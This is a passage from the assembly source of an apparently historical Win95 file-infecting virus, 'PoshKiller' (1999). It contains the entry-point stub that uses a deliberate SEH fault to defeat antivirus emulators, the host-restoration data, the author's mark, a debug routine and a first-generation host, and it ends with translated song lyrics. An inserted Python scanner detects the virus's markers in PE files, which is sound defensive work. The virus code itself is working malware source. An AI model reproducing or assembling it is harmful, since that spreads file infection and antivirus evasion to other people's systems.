; For jump building: the 30-byte stub written over the host's entry point.
; It registers the code right after the CALL as SEH handler, then faults on
; purpose (DEC BYTE PTR [0]); the handler reloads ESP from the establisher
; frame, unhooks itself and JMPs to the virus body. Emulators that don't
; implement SEH never get past the fault.

jumpyx label byte
call seh_tricky
mov esp,[esp+08h] ; Handler entry: [ESP+8] = establisher frame
xor edx,edx
pop dword ptr fs:[edx] ; Restore the previous handler
pop edx ; Discard the CALL's return address
jumpy: db 0E9h ; JMP rel32, patched at infection time
dd 00000000h
seh_tricky:
xor edx,edx
push dword ptr fs:[edx] ; The CALL's return address is the handler
mov fs:[edx],esp
dec byte ptr [edx] ; Fault on address 0: DIE EMULATORS!!!!!!
sjumpy equ ($-offset jumpyx)
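
Taken together, the infection routine and this stub leave a fixed set of traces in a victim: "POSH" in Win32VersionValue (a reserved field that is otherwise zero), the last section made code+execute+write with VirtualSize set equal to SizeOfRawData, the entry-point section made writable, and the 30-byte jumpyx stub at the entry point. The following triage scanner is an added example, not code from the phile or from any AV product: it walks a PE32 header and reports each of those markers. The stub pattern assumes TASM's usual encodings for the instructions in jumpyx and wildcards both rel32 fields; the two-section sample PE is constructed in memory for the test and is not a runnable program.

```python
import struct

POSH_MARK = b"POSH"                     # stored in Win32VersionValue (optional header +34h)
WRITE = 0x80000000
SECTION_FLAGS = 0x00000020 | 0x20000000 | WRITE      # section_flags in the source
_X = None                               # wildcard: the rel32 of the call and of the jmp
STUB = [0xE8, _X, _X, _X, _X,           # call seh_tricky
        0x8B, 0x64, 0x24, 0x08,         # mov esp,[esp+8]
        0x33, 0xD2, 0x64, 0x8F, 0x02,   # xor edx,edx / pop dword ptr fs:[edx]
        0x5A, 0xE9, _X, _X, _X, _X,     # pop edx / jmp rel32
        0x33, 0xD2, 0x64, 0xFF, 0x32,   # xor edx,edx / push dword ptr fs:[edx]
        0x64, 0x89, 0x22, 0xFE, 0x0A]   # mov fs:[edx],esp / dec byte ptr [edx]


def stub_matches(buf):
    """True when buf starts with the jumpyx stub (wildcard bytes ignored)."""
    return len(buf) >= len(STUB) and all(p is None or p == b for p, b in zip(STUB, buf))


def parse_pe(data):
    """Minimal PE32 header walk: entry point, Win32VersionValue and the section table."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    sections = []
    for i in range(nsec):
        off = opt + opt_size + i * 40
        vsize, va, rsize, raw, chars = struct.unpack_from("<IIII12xI", data, off + 8)
        sections.append({"vsize": vsize, "va": va, "rsize": rsize, "raw": raw, "chars": chars})
    return {"entry": struct.unpack_from("<I", data, opt + 0x10)[0],
            "w32ver": bytes(data[opt + 0x34:opt + 0x38]), "sections": sections}


def section_of_rva(sections, rva):
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rsize"]):
            return s
    return None


def scan(data):
    """Return each marker as a finding plus an overall verdict."""
    pe = parse_pe(data)
    last = pe["sections"][-1]
    ep_sec = section_of_rva(pe["sections"], pe["entry"])
    f = {"posh_marker": pe["w32ver"] == POSH_MARK,
         "last_section_rwx": last["chars"] & SECTION_FLAGS == SECTION_FLAGS,
         "last_vsize_eq_raw": last["vsize"] == last["rsize"],
         "entry_section_writable": bool(ep_sec) and bool(ep_sec["chars"] & WRITE),
         "entry_stub": False}
    if ep_sec:
        off = pe["entry"] - ep_sec["va"] + ep_sec["raw"]
        f["entry_stub"] = stub_matches(data[off:off + len(STUB)])
    f["verdict"] = f["posh_marker"] or (f["entry_stub"] and f["entry_section_writable"])
    return f


def build_sample(infected):
    """Constructed two-section PE32 for testing (not a runnable program): .text holds
    the entry point, .data is the last section the virus would append to."""
    falign, salign = 0x200, 0x1000
    dos = bytearray(0x40); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 0x40)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)            # PE32 magic
    struct.pack_into("<I", opt, 0x10, 0x1000)           # AddressOfEntryPoint
    struct.pack_into("<I", opt, 0x1C, 0x400000)         # ImageBase
    struct.pack_into("<II", opt, 0x20, salign, falign)  # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 0x38, 0x3000, 0x200)   # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 0x5C, 16)               # NumberOfRvaAndSizes
    text, data = bytearray(falign), bytearray(falign)
    text[:3] = b"\x33\xC0\xC3"                          # xor eax,eax / ret
    text_chars, data_chars, data_vsize = 0x60000020, 0xC0000040, 0x10
    if infected:
        opt[0x34:0x38] = POSH_MARK
        text_chars |= SECTION_FLAGS                     # entry-point section made writable
        data_chars |= SECTION_FLAGS                     # last section made code+exec+write
        data_vsize = falign                             # VirtualSize set equal to SizeOfRawData
        text[:len(STUB)] = bytes(0 if b is None else b for b in STUB)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x102)
    def sec(name, vsize, va, raw, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, falign, raw, 0, 0, 0, 0, chars)
    hdr = (bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)
           + sec(b".text", 3, 0x1000, 0x200, text_chars)
           + sec(b".data", data_vsize, 0x2000, 0x400, data_chars))
    return hdr + bytes(0x200 - len(hdr)) + bytes(text) + bytes(data)


if __name__ == "__main__":
    for tag in (False, True):
        print("infected sample:" if tag else "clean sample:", scan(build_sample(tag)))
```

The verdict deliberately does not rely on the section-flag findings alone: packers and some linkers also produce writable code sections, so those are reported as supporting evidence, while the "POSH" marker or the stub sitting at a writable entry point is what actually identifies this infector.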

; Store here overwritten data

oldjmpy db sjumpy dup (00h)

; My mark :)

mark db "[Win95.PoshKiller v1.00]",0
db "(c) 1999 Billy Belcebu/iKX",0

IF DEBUG
beepy:
mov ax, 1000
mov bx, 200
mov cx, ax
mov al, 0b6h
out 43h, al
mov dx, 0012h
mov ax, 34dch
div cx
out 42h, al
mov al, ah
out 42h, al
in al, 61h
mov ah, al
or al, 03h
out 61h, al
l1:
mov ecx, 4680
l2:
loop l2
dec bx
jnz l1
mov al, ah
out 61h, al
ret
ENDIF
virus_end label byte

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Data in the heap |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

heap_begin label byte
semaphore db 00h
pehead dd 00000000h
ptr_top_chain equ ($-offset virus_start)
top_chain dd 00000000h
temp_addr dd 00000000h
fname db 100h dup (00h)
header db 400h dup (00h)
heap_end label byte

; I speak Valencian, not Catalan.

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | First generation host |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

host:
pop dword ptr fs:[0]
pop eax
popad

push 00000000h
push offset szTitle
push offset szMessage
push 00000000h
call MessageBoxA

push 00000000h
call ExitProcess

end poshkiller

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Bonus Track |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
;
; If you know Spanish, and you are like me, you'll understand and feel
; identified with the following lyrics. They speak about how people change
; (for the worse) because of the system. It's from Def Con Dos' latest album,
; called 'DE POCA MADRE'. Enjoy!
;
; Fin de siglo (End of the Century)
; ---------------------------------
;
; I don't know if it concerns you
; I don't know if it surprises you
; but I notice something strange in my friends' eyes
; they don't recognise me, they don't greet me anymore
; and now they all wear blue suits instead of leather jackets
; They no longer drink in the street
; they no longer hang out in bars
; they no longer piss on street corners
; nor throw up in doorways
; Now they get up early, they've become serious people
; who save for their old age and vote for the right
; I don't know what happens when I want to talk to my friends
; they don't pick up the phone or they tell me they've left
; I can't get hold of them to go out and raise hell together
; and I always end up alone with my elbow on the bar
; Something smells odd, there's something they haven't told me
; and I'm starting to suspect they've been abducted
; Abduction is everybody's problem
; please don't leave me, NO! don't leave me alone
; END OF THE CENTURY surrounded by abductees
; END OF THE CENTURY
; END OF THE CENTURY alone and without friends
; What a fucked-up end of the century
; END OF THE CENTURY surrounded by abductees
; END OF THE CENTURY
; END OF THE CENTURY alone and without friends
; What a fucked-up end of the century
; I don't know if it concerns you
; I don't know if it surprises you
; but replicas of my friends have come out of pods
; they look just like them, they have the same faces, but I know
; they're not them when I look into their eyes
; They've all cut off their long hair
; they've all settled down
; and what they used to hate is now celebrated
; They no longer smoke JOINTS, they only do coke
; and wear blue polo shirts with the national flag
; Everyone happy, everyone with a mobile phone
; they talk among themselves, they're a new order
; Abduction is everybody's problem
; please don't leave me, NO! don't leave me alone
; END OF THE CENTURY surrounded by abductees
; END OF THE CENTURY
; END OF THE CENTURY alone and without friends
; What a fucked-up end of the century
; END OF THE CENTURY surrounded by abductees
; END OF THE CENTURY
; END OF THE CENTURY alone and without friends
; What a fucked-up end of the century
;
; ---
; Copyright (c) 1998 Def Con Dos; "De Poca Madre" album.


